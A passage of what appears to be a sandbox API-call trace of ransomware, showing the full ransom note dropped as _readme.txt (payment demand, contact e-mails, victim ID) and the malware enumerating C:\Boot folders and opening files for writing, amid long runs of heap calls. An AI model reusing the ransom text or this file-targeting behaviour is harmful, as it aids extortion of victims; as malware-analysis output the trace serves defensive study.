on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0183.346] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac5768 [0183.346] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\_readme.txt" (normalized: "c:\\boot\\cs-cz\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac5768 | out: hHeap=0x2c0000) returned 1 [0183.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae3ea0 | out: hHeap=0x2c0000) returned 1 [0183.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.348] FindFirstFileW (in: lpFileName="C:\\Boot\\cs-CZ\\*" (normalized: "c:\\boot\\cs-cz\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9565de80, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d38220, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d38220, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0183.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.349] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9565de80, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d38220, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d38220, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0183.349] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d38220, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0183.349] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.349] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0183.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.349] PathFindExtensionW (pszPath="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned=".mui" [0183.349] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.354] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0183.354] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d38220, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0183.354] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0183.354] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.355] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0183.355] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0183.355] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0183.355] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0183.355] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.355] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.355] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.356] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.356] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.356] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.356] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.357] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.357] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.357] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.357] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.357] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.357] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.358] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.358] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.358] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.358] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.358] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.358] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0183.359] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.359] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.359] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.359] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.359] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0183.359] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.360] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.360] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.360] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.360] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.360] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.361] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0183.361] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.361] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0183.361] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.362] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.362] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.362] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0183.362] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.362] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.362] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.362] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.363] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.363] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.363] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.363] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.363] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.364] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0183.364] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.364] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0183.365] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.365] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.365] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.365] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.365] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.366] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.366] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.366] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.366] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.366] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.366] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.366] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.367] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.367] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.367] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.367] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.367] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.368] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.368] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.368] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.368] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.368] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.368] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.368] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.368] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.369] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.369] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.369] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.369] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.369] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.369] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.369] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.369] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0183.370] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.370] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.370] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.370] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.370] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.370] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.371] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0183.371] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.371] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.372] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.372] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.372] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0183.372] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.372] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.372] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.372] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0183.372] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.373] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.373] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.373] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.374] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.374] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0183.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0183.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.376] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.376] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0183.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.377] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.377] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.377] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.377] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.378] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.378] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.378] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.378] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.378] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.378] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.379] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.379] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.379] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.379] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.379] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.379] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.379] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.380] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.380] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.380] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.380] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.380] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.380] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.380] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.381] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.381] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.381] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.381] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.381] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0183.381] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.381] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.382] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.382] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.382] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.382] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.382] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.382] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.382] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0183.383] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.383] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.383] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.383] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0183.383] HeapFree 